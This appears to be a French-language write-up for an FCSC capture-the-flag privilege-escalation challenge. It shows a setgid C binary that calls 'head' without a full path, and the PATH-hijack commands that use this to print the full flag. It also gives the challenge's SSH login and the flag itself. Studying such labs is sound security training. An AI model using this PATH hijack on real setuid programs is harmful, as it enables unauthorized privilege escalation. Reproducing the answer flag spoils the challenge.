# Privesc Me (1) - mise

**Challenge**

Un challenge d'échauffement vous attend dans le dossier stage0. À vous de trouver un moyen d'augmenter vos privilèges.

ssh -p7005 challenger@challenges1.france-cybersecurity-challenge.fr (mot de passe : challenger.)

Note : cet environnement est partagé entre les 4 challenges Privesc Me.

**Solution**

On se connecte sur la machine, il s'agit d'un classique wargame avec le code source d'une binaire set-uid qu'il va falloir exploiter pour lire le fichier flag.txt.

Le code de stage0 est le suivant :

```c
#define _GNU_SOURCE 
#include <stdlib.h>
#include <unistd.h>
#include <sys/types.h>

int main(int argc, char const *argv[]) {
    setresgid(getegid(), getegid(), getegid());
    system("head -c5 flag.txt");
    return 0;
}
```

Effectivement, si on lance le binaire, celui-ci ne va nous afficher que les premiers octets du flag :
```shell
$ ./stage0 
FCSC{
```

La vulnérabilité ici est que la commande `head` est appelée sans préciser le chemin, et va donc être cherchée dans les répertoires de la variable `PATH`. On peut donc la substituer avec une autre commande de même nom, écrite par nos soins, dont l'emplacement dans la variable d'environnement `PATH` serait plus prioritaire. Par exemple :


```shell
$ TMP=$(mktemp -d)
$ cd $TMP
$ echo 'cat -- $*' > head
$ chmod +x head
$ ln -s ~/stage0/flag.txt 
$ export PATH=.:$PATH
$ ~/stage0/stage0 
cat: -c5: No such file or directory
FCSC{e5dc17021365baa6719ea48311873d621a3e00fa6f9c41bd2efb4e6c48bf4090}
```